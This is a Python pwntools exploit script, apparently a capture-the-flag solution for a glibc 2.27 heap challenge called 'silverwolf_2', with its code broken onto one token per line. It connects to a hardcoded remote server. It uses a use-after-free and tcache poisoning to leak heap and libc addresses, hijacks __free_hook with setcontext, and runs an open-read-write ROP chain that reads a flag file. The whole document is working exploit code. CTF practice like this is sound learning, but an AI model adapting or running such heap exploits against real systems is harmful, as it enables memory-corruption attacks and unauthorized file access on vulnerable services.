from
pwn
import
*
from
LibcSearcher
import
*
s
=
lambda
buf: io.send(buf)
sl
=
lambda
buf: io.sendline(buf)
sa
=
lambda
delim, buf: io.sendafter(delim, buf)
sal
=
lambda
delim, buf: io.sendlineafter(delim, buf)
shell
=
lambda
: io.interactive()
r
=
lambda
n
=
None
: io.recv(n)
ra
=
lambda
t
=
tube.forever:io.recvall(t)
ru
=
lambda
delim: io.recvuntil(delim)
rl
=
lambda
: io.recvline()
rls
=
lambda
n
=
2
*
*
20
: io.recvlines(n)
libc_path
=
"./libc-2.27.so"
elf_path
=
"./silverwolf_2"
libc
=
ELF(libc_path)
elf
=
ELF(elf_path)
if
sys.argv[
1
]
=
=
'1'
:
context(log_level
=
'debug'
,terminal
=
'/bin/zsh'
, arch
=
'amd64'
, os
=
'linux'
)
elif
sys.argv[
1
]
=
=
'0'
:
context(log_level
=
'info'
,terminal
=
'/bin/zsh'
, arch
=
'amd64'
, os
=
'linux'
)
cho
=
'Your choice: '
siz
=
'Size: '
con
=
'Content: '
ind
=
'Index: '
edi
=
''
def
add(index
=
'
',size='
',c='
1
'):
sal(cho,c)
sal(ind,
str
(index))
sal(siz,
str
(size))
def
free(index,c
=
'4'
):
sal(cho,c)
sal(ind,
str
(index))
def
show(index,c
=
'3'
):
sal(cho,c)
sal(ind,
str
(index))
def
edit(index,content
=
'
',c='
2
'):
sal(cho,c)
sal(ind,
str
(index))
sa(con,content)
def
get_proc_base(p):
proc_base
=
p.libs()[p._cwd
+
p.argv[
0
].strip(
'.'
)]
info(
hex
(proc_base))
def
get_libc_base(p):
libc_base
=
p.libs()[libc_path]
info(
hex
(libc_base))
def
clean():
for
i
in
range
(
14
):
add(
0
,
0x18
)
add(
0
,
0x58
)
for
i
in
range
(
12
):
add(
0
,
0x68
)
def
exp():
global
io
io
=
remote(
'124.70.110.211'
,
23535
)
clean()
add(
0
,
0x78
)
free(
0
)
show(
0
)
r(
9
)
raw
=
u64(r(
6
).ljust(
8
,
'\x00'
))
info(
"raw:"
+
hex
(raw))
heap
=
raw
-
0x1170
success(
"heap: "
+
hex
(heap))
edit(
0
,p64(heap
+
0x10
)
+
p64(
0
)
+
'\n'
)
add(
0
,
0x78
)
add(
0
,
0x78
)
edit(
0
,
'\x00'
*
0x78
)
for
i
in
range
(
7
):
free(
0
)
edit(
0
,p64(
0
)
*
2
+
'\n'
)
free(
0
)
show(
0
)
r(
9
)
libc.address
=
u64(ru(
'\x7f'
).ljust(
8
,
'\x00'
))
-
96
-
0x10
-
libc.sym[
'__malloc_hook'
]
success(
"libc: "
+
hex
(libc.address))
setcontext
=
libc.sym[
'setcontext'
]
+
53
free_hook
=
libc.sym[
'__free_hook'
]
success(
"free_hook:"
+
hex
(free_hook))
success(
"setcontext:"
+
hex
(setcontext))
edit(
0
,p64(
0x1
)
*
8
+
p64(
0
)
*
3
+
p64(heap
+
0xef8
)
+
p64(free_hook)
+
p64(heap
+
0xe18
)
+
p64(heap
+
0xe80
)
+
'\n'
)
success(
"orw:"
+
hex
(heap
+
0xe18
))
add(
0
,
0x58
)
edit(
0
,p64(setcontext)
+
'\n'
)
add(
0
,
0x48
)
flag_addr
=
heap
+
0xf30
rsp
=
heap
+
0xe18
rbx
=
0
rbp
=
0
r12
=
0
r13
=
0
r14
=
0
pop_rdi
=
libc.address
+
0x00000000000215bf
stack_pivot
=
flat(
rbx,rbp,r12,r13,r14,
rsp
+
8
,
pop_rdi,
'./flag\x00'
)
info(
"stack_pivot len:"
+
hex
(
len
(stack_pivot)))
edit(
0
,stack_pivot
+
'\n'
)
add(
0
,
0x68
)
flag_str_addr
=
heap
+
0xf30
pop_rdi
=
libc.address
+
0x00000000000215bf
pop_rsi
=
libc.address
+
0x0000000000023eea
syscall
=
0xD2745
+
libc.address
pop_rax
=
libc.address
+
0x0000000000043ae8
pop_rdx_r10
=
0x0000000000130544
+
libc.address
flag_addr
=
heap
+
0x200
info(
hex
(pop_rdi)
+
' '
+
hex
(pop_rsi))
orw1
=
flat(
pop_rdi,
flag_str_addr,
pop_rsi,
0
,
pop_rax,
2
,
syscall,
pop_rdi,
3
,
pop_rsi,
flag_addr,
pop_rdx_r10,
0x100
,
)
edit(
0
,orw1
+
'\n'
)
add(
0
,
0x78
)
orw2
=
flat(
0
,
pop_rax,
0
,
syscall,
pop_rdi,
1
,
pop_rsi,
flag_addr,
pop_rdx_r10,
0x100
,
0
,
pop_rax,
1
,
syscall
)
edit(
0
,orw2
+
'\n'
)
shell()
exp()